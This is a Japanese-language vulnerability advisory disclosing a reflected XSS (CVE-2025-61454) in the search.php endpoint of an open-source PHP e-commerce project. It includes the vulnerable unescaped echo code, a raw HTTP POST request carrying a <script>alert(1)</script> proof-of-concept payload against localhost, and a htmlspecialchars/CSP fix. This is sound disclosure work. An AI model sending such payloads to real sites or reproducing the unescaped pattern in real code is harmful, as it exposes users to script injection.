
開示日: 2025年10月14日
CVE ID: CVE-2025-61454
深刻度: MEDIUM (CVSS 6.1)
E-commerce Project v1.0 の search.php エンドポイントに、反射型クロスサイトスクリプティング (XSS) の脆弱性が存在します。search パラメータ内のサニタイズされていない入力が、そのままレスポンスHTMLに反映されるため、攻撃者は悪意のあるリンクを訪問したユーザーや細工されたリクエストを送信したユーザーのブラウザ上で任意のJavaScriptを実行できます。
この問題には識別子 CVE-2025-61454 が割り当てられています。開示時点では、ベンダーから パッチはリリースされていません。
search.phphttp://localhost/e-commerce-main/search.phpサーバーは、POSTデータの search パラメータをレスポンスHTMLに反映する前に適切にサニタイズできていません。これにより、攻撃者はJavaScriptペイロードを注入し、クライアント側でのコード実行を引き起こすことができます。
攻撃者はスクリプト状のコンテンツを含む入力を細工し、脆弱なPOSTエンドポイントに送信します。サーバーは適切なHTML/属性/JSエンコーディングを適用せずに入力をHTMLレスポンスに反映するため、ブラウザは反映されたコンテンツを実行可能なマークアップとして扱い、実行します。これは反射型 (非永続的) XSS のシナリオです。攻撃者は被害者にリクエストを実行させるか、特別に構築されたリンク/フォームを訪問させる必要があります。
$search = $_POST['search'];
echo "<div>Search results for: $search</div>";
| CWE ID | タイトル |
|---|---|
| CWE-79 | ウェブページ生成時の入力の不適切な無害化 ('クロスサイトスクリプティング') |
| スコア | 深刻度 | ベクター文字列 |
|---|---|---|
| 6.1 | MEDIUM | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N |
悪用に成功した場合、以下の結果が生じる可能性があります:
git clone https://github.com/Bhabishya-123/E-commerce.git
XAMPP/LAMPを使用してプロジェクトをデプロイし、アプリケーションにアクセスします。
POST /e-commerce-main/search.php HTTP/1.1
Host: localhost
Referer: https://localhost/e-commerce-main/
Content-Type: application/x-www-form-urlencoded
search=yxo9p%3cscript%3ealert(1)%3c%2fscript%3exnzmd&submit=
search=yxo9p<script>alert(1)</script>xnzmd&submit=
yxo9p<script>alert(1)</script>xnzmd
説明:
ペイロード <script>alert(1)</script> は search パラメータ内に埋め込まれています。被害者がこの悪意のあるペイロードを含む検索フォームを送信すると (またはソーシャルエンジニアリングによって送信させられると)、JavaScriptが被害者のブラウザコンテキストで実行されます。
脆弱性がある場合、ブラウザはJavaScriptコードを実行し、値 1 を含むアラートボックスを表示します。これにより、XSS悪用の成功が確認されます。
htmlspecialchars() または同等の関数でエンコードしてください。search パラメータに対してサーバーサイドの入力検証を実装してください。$search = htmlspecialchars($_POST['search'], ENT_QUOTES, 'UTF-8');
echo "<div>Search results for: $search</div>";
Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'
| イベント | 日付 |
|---|---|
| 脆弱性の発見 | 2025年9月16日 |
| 公開開示 | 2025年10月13日 |
| パッチの提供 | ❌ 開示時点では利用不可 |
この脆弱性は以下の人物によって発見・開示されました:
Tansique Dasari
🔗 GitHub
✉️ [email protected]
💬 このアドバイザリは、公式のベンダーパッチが存在しないため、独立して公開されています。